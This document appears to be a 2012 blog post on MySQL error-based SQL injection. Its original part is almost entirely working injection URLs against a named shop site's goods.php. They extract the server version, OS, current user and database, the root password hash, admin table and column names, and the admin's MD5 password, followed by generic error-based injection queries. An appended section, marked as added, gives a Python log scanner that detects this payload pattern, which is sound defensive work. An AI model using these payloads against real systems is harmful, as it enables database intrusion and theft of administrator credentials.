Blind injection in detail

Posted on 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin password (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
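Detection logic for the payload structure every request above shares (count(*) combined with concat(..., floor(rand()*2)) and a group by), as an added example that is not part of the original post: it URL-decodes each access-log request, flags those carrying all three markers, and reports what the payload is trying to read. The log lines, client IPs and timestamps are constructed sample data.

```python
"""Flag MySQL error-based SQLi (count(*) + concat(..., floor(rand()*2)) + group by) in
access logs. Added example, not from the original post; IPs, paths and timestamps are constructed."""
import re
from urllib.parse import unquote_plus
# Structural markers of the duplicate-key technique; all three must be present once decoded.
MARKERS = [
    re.compile(r"floor\s*\(\s*rand\s*\(", re.I),  # floor(rand()*2) / floor(rand(0)*2)
    re.compile(r"count\s*\(\s*\*\s*\)", re.I),    # count(*)
    re.compile(r"group\s+by\s+\w+", re.I),        # group by x
]
# What the payload tries to read; checked in order, most specific first.
TARGETS = [
    (re.compile(r"@@version_compile_os", re.I), "os"),
    (re.compile(r"@@version", re.I), "version"),
    (re.compile(r"\buser\s*\(\s*\)", re.I), "user"),
    (re.compile(r"\bdatabase\s*\(\s*\)", re.I), "database"),
    (re.compile(r"mysql\.user", re.I), "mysql.user"),
    (re.compile(r"information_schema\.", re.I), "information_schema"),
]
# Combined-log prefix: client IP and the request target (a URL contains no spaces).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<req>\S+) [^"]*"')

def classify(request: str):
    """Return (flagged, target) for one request; decode twice to defeat double encoding."""
    text = unquote_plus(unquote_plus(request))
    if not all(m.search(text) for m in MARKERS):
        return False, None
    for pat, name in TARGETS:
        if pat.search(text):
            return True, name
    return True, "unknown"

def scan_log(lines):
    """Return [(line_no, client_ip, target)] for every flagged access-log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        flagged, target = classify(m.group("req")) if m else (False, None)
        if flagged:
            hits.append((n, m.group("ip"), target))
    return hits

# Constructed sample log: a normal request, two injection attempts, and a benign "group by".
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [05/Sep/2012:14:59:41 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 312',
    '198.51.100.9 - - [05/Sep/2012:15:01:02 +0800] "GET /goods.php?id=352&wsid=1%20and(select%201%20from(select%20count(*),concat((select%20user()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 312',
    '198.51.100.9 - - [05/Sep/2012:15:02:10 +0800] "GET /search.php?q=group+by+price HTTP/1.1" 200 900',
]
```

Run scan_log(SAMPLE_LOG) to get the flagged lines; a 500 status on such a request is the error path this technique relies on, so pairing the match with the status code is a useful second signal.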